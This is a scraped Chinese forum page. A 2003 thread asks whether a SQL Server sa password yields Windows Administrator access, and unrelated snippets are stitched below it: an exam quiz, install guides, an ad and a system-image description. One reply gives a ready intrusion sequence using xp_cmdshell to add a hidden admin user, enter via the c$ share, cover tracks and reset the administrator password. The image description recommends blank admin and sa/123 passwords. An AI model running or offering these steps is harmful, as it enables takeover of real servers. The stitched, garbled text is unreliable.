能不能过sa口令获取Win2K的Administrator口令?

bcboy 2003-09-11 01:30:30

如果可以的话不是不安全的么?

...全文

53 2 打赏收藏转发到动态举报

写回复

2 条回复

切换为时间正序

请发表友善的回复…

发表回复

CrazyFor 2003-09-11

打赏
举报

回复

可能获得administrators的权限.
所以保护SA的密码要象administrator的密码一样.

pengdali 2003-09-11

打赏
举报

回复

exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码：
xp_cmdshell 'net user administrator "123"'

网络安全期末复习题及答案一、选择题： 1. 计算机网络安全的目标不包括( A ) A.可移植性 B.保密性 C.可控性 D.可用性 2. SNMP的中文含义为( B ) A.公用管理信息协议 B.简单网络管理协议 C.分布式安全管理协议 D.简单邮件传输协议 3. 端口扫描技术( D ) A.只能作为攻击工具 B.只能作为防御工具 C.只能作为检查系统漏洞的工具 D.既可以作为攻击工具，也可以作为防御工具 4. 在以下人为的恶意攻击行为中，属于主动攻击的是( A ) A、身份假冒 B、数据解密 C、数据流分析 D、非法访问 5. 黑客利用IP地址进行攻击的方法有：( A ) A. IP欺骗 B. 解密 C. 窃取口令 D. 发送病毒 6. 使网络服务器中充斥着大量要求回复的信息，消耗带宽，导致网络或系统停止正常服务，这属于什么攻击类型? ( A ) A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 7. 向有限的空间输入超长的字符串是哪一种攻击手段？( A ) A、缓冲区溢出 B、网络监听 C、拒绝服务 D、IP欺骗 8. 用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段 ( B ) A、缓存溢出攻击 B、钓鱼攻击 C、暗门攻击 D、DDOS攻击 9. Windows NT 和Windows 2000系统能设置为在几次无效登录后锁定帐号,这可以防止：( B ) A、木马 B、暴力攻击 C、IP欺骗 D、缓存溢出攻击 10. 当你感觉到你的Win2003运行速度明显减慢，当你打开任务管理器后发现CPU的使用率达到了百分之百，你最有可能认为你受到了哪一种攻击。( B ) A、特洛伊木马 B、拒绝服务 C、欺骗 D、中间人攻击 11. 假如你向一台远程主机发送特定的数据包，却不想远程主机响应你的数据包。这时你使用哪一种类型的进攻手段？( B ) A、缓冲区溢出 B、地址欺骗 C、拒绝服务 D、暴力攻击 12. 小李在使用super scan对目标网络进行扫描时发现，某一个主机开放了25和110端口，此主机最有可能是什么？( B ) A、文件服务器 B、邮件服务器 C、WEB服务器 D、DNS服务器 13. 你想发现到达目标网络需要经过哪些路由器，你应该使用什么命令？( C ) A、ping B、nslookup C、tracert D、ipconfig 14. 黑客要想控制某些用户，需要把木马程序安装到用户的机器中，实际上安装的是( B ) A．木马的控制端程序 B．木马的服务器端程序 C．不用安装 D．控制端、服务端程序都必需安装 15. 为了保证口令的安全，哪项做法是不正确的( C ) A 用户口令长度不少于6个字符 B 口令字符最好是数字、字母和其他字符的混合 C 口令显示在显示屏上 D 对用户口令进行加密 16. 以下说法正确的是( B ) A．木马不像病毒那样有破坏性 B．木马不像病毒那样能够自我复制 C．木马不像病毒那样是独立运行的程序 D．木马与病毒都是独立运行的程序 17. 端口扫描的原理是向目标主机的________端口发送探测数据包，并记录目标主机的响应。( C ) A.FTP B.UDP C.TCP/IP D.WWW 18. 假冒网络管理员，骗取用户信任，然后获取密码口令信息的攻击方式被称为( B )。 A. 密码猜解攻击 B. 社会工程攻击 C. 缓冲区溢出攻击 D. 网络监听攻击 19. 在进行微软数据库（Microsoft SQL Database）口令猜测的时候，我们一般会猜测拥有数据库最高权限登录用户的密码口令，这个用户的名称是( C )？ A. admin B. administrator C. sa D. root 20. 下列哪一种网络欺骗技术是实施交换式（基于交换机的网络环境）嗅探攻击的前提( C )? A. IP欺骗 B. DNS欺骗 C. ARP欺骗 D. 路由欺骗 21. 下列哪一种扫描技术属于半开放（半连接）扫描( B )？ A. TCP Connect扫描 B. TCP SYN扫描 C. TCP FIN扫描 D. TCP ACK扫描 22. 恶意大量消耗网络带宽属于拒绝服务攻击中的哪一种类型( C )？ A. 配置修改 B. 基于系统缺陷型 C. 资源消耗型 D. 物理实体破坏型 23. 现今，网络攻击与病毒、蠕虫程序越来越有结合的趋势，病毒、蠕虫的复制传播特点使得攻击程序如虎添翼，这体现了网络攻击的下列哪种发展趋势( C )？ A. 网络攻击人群的大众化 B. 网络攻击的野蛮化 C. 网络攻击的智能化 D. 网络攻击的协同化 24. 网络监听（嗅探）的这种攻击形式破坏了下列哪一项内容( B )？ A. 网络信息的抗

Win7系统怎样安装SQL2000数据库以下是Win7系统安装SQL2000企业版数据库的方法开始前如果已经安装失败，请删除C：\Program Files\Microsoft SQL Server目录下的80和MSSQL两个目录 1、确保关闭第三方防火墙，系统自带的不用关 2、启用系统内置的管理员administrator，不要用自己创建的管理员，如果内置管理员名已被更改，改回来后重启电脑 3、确保以下两个服务开启：Print Spooler、Server("我的电脑"上右键"管理"，左侧列表中选择"服务") 4、确保本地连接里属性中"Microsoft网络的文件和打印机共享"前面有钩 5、到"网络和共享中心"左侧点"高级共享设置"，开启所有共享，"网络发现"开不开无所谓。在安装sql2000的MSDE程序上右键-》兼容性- 》在"使用管理员权限运行"上打钩，不需要选择"以兼容模式运行这个程序" 6、单独下载MSDE，微软官方下载地址： 7、安装MSDE，安装方法如下：双击解压CHS_MSDE2000A.exe，命令提示符下进入解压后的文件夹路径后输入： setup sapwd="sa"securitymode=SQL disablenetworkprotocols=0 注：上面的"sa"是sa的口令，可自己换成别的 8、打开光盘或者光盘镜像，正常安装SQL2000企业版，如果安装时提示sql2000挂起无法安装，打开注册表编辑器，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager中找到PendingFileRenameOperations项目，并删除它。这样就可以清除安装暂挂项目。 9、安装SQL2000SP4补丁，微软官方下载地址：如何去掉安装SQL2000后系统托盘里的同步中心图标：注册表中键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Syn cmgr\Handlers 项中找到一个与SQL Server 2000相关的分支，删除它,重启安装SQL2000后，会发现sa用户不能连到数据库(查询分析器和编程中只支持Windows登录验证)，解决办法如下：注册表中键值 [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\MSSQLSERVER\MSSQLSERVER] 这个项里面有一个键值LoginMode，默认下，值是1，现在将值改为2，重启电脑。 Win7安装SQL2000后在企业管理器中新建表出错问题解决：新建表时，先单击数据库中已存在的一张表，然后在上面右键"新建表"，如果在空白处右键来新建表，是会出问题的。本文来自: 高校自动化网(Www.zdh1909.com) 详细出处参考(转载请保留本链接)：http://www.zdh1909.com/html/sql/12314.html ----------------------- Win7系统怎样安装SQL2000数据库全文共2页，当前为第1页。 Win7系统怎样安装SQL2000数据库全文共2页，当前为第2页。

Nginx高性能Web服务器视频培训课程，该教程通过本次Nginx全套系列实战课程的学习：Nginx配置、安装、企业实战Nginx+tomcat动静分离架构、日志切割、分析、常见故障解析、均衡TCP协议案例等。大家可以更加熟练Nginx在企业中的应用，了解目前大中型企业里面运维架构，以及学会如何提升自己的能力，满足职业生涯的发展，做到准备充足，备战运维。

无数测试表明，WINDOWS SERVER 2003的CPU，内存，磁盘性能以及安全性，是远远超过WINDOWS XP的并且相对于硬件要求恐怖的VISTA来说，在中低端PC上，2003的性能表现是远远超过VISTA的，在微软新一代操作系统WINDOWS7尚未成熟期间，2003无疑是操作系统中的首选本人制作的2003系统，基于MSDN原版SERVER 2003 SP2修改而来，默认2003系统很多设置和功能对于办公用户及个人用户来说，使用起来是极其繁琐的。本系统正是针对音创内部员工的使用习惯，工作需求，而精心订制出的一款操作系统.在修改和优化了大量设置的前提下，未精简系统的任何功能， 2003功能中的IIS，DHCP，DNS服务器，证书授权加密等功能，全部可正常使用，所有功能完整无缺。优化调整选项： 1 关闭开关机事件报告及预警（如服务器安装，可手动开启） 2 开启系统管理员空密码自动登陆，方便使用，同时停用超级管理员帐户，并修改默认名称administrator 为admin,保证一定安全性 3 在组策略中停用一些根本用不到的帐户，并修改系统关键文件用户权限 4 关闭常见木马及后门程序使用端口，如爱情后门，灰鸽子等使用的端口，保留了远程桌面，FTP等一些常见端口（请注意防范） 5 修改网络选项，可防范一些已知蠕虫及针对系统漏洞发起的攻击 6 禁止U盘等所有磁盘自动运行，防范U盘病毒 7 优化NTFS分区，禁止自动更新访问标记，删除系统启动分区预读死联接文件，提高磁盘访问速度 8 关闭系统错误报告，禁止核心内存转储，关闭华医生后台记录功能 9 优化程序请求速度，优化系统2级数据缓存，优化前台程序CPU响应优先级 10 修改网络数据包报文寿命为64，传输缓冲单元为8192，提升上网速度 11 删除系统默认$ 共享，删除注册表中搜寻打印机和计划任务键值，提升局域网访问速度 12 去除IE分级审查口令，修改IE同时线程连接数为5 13 去除默认索引项，指定索引路径和文件类型，加快搜索文件的速度 14 优化后台服务，关闭不常用服务，包括打印机，扫描仪，摄象头等服务（可手动开启，或安装设备驱动时自动开启）默认开启局域网服务 15 优化桌面图标缓存，并去除快捷方式中的快捷方式字样和小箭头 16 更新常见如780G，P35，P45，NCP6X，7X系列等常见ACHI存储驱动，用原生SATA模式进入系统不再蓝屏但未加入自动安装驱动功能，作为硬件和操作系统沟通的桥梁，如自动安装驱动，可能会导致一些问题出现，手动安装为最佳，并且应该选择较新版本驱动，以保证系统稳定性，兼容性及性能最大化 17 修改系统BOOT.INI文件，关闭数据执行保护，并增加内存重映射，完美支持8GB内存使用 18 更新系统安全补丁至2009年3月，并且更新INTEL和AMD双核补丁和驱动，让多核CPU工作更完美 19 更新系统IE浏览器为IE7 PRO，并已安装好3月最新安全补丁 20 更新MEDIAPLAYER为英文原版11，优化MEDIA打开视频速度，并且修改默认黑色背景为动态蓝天背景 21 更新.net组件，vc++组件为2009年最新，以保证系统软件兼容性 22 更新DX9.0c组件包为最新，以保证某些调用DX API的播放器兼容性 23 替换系统内默认远程桌面连接工具为VISTA下远程桌面连接工具 24 替换系统内HIDUSBF.SYS文件，修改PS2鼠标刷新率为250Hz,USB鼠标为220Hz,定位更准确 25 替换系统默认记事本，用WINDOWS7自带NOTEPAD2代替，功能更为强大 26 替换系统主题文件，可完美安装第3方主题软件 27 增加内存虚拟盘，默认盘符为J，默认分配内存大小为64M，并且移动IE临时文件位置到J盘，减少垃圾文件造成的文件碎片，提升磁盘性能（4G内存用户建议分配512M或更多内存作为虚拟硬盘，将用户临时文件也放置在上面，可大大减少文件碎片） 28 更新cleartype tuning为1.0.3版，让液晶在2003系统下显示字体和VISTA一样圆润，锐利（可在控制面版自行调整效果） 29 已安装好SQL2000，方便点歌软件和收银系统软件使用，默认用户为sa,密码为123 此外还有一些优化设置选项，不在此一一列出，请大家养成良好的电脑使用习惯，避免系统出错，才能最高的保持工作效率

【51CTO.com 独家特稿】Microsoft SQLServer是一个c/s模式的强大的关系型数据库管理系统，应用领域十分广泛，从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。我们都知道，在网络中Microsoft SQLServer的入侵最常见的就是利用SA弱口令入侵了，而核心内容就是利用Microsoft SQLServer中的存储过程获得系统管理员权限，那到底什么是存储过程？为什么利用它可以获得系统管理员权限？存储过程是存储在SQLServer中的预先写好的SQL语句集合，它

34,587

社区成员

254,588

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章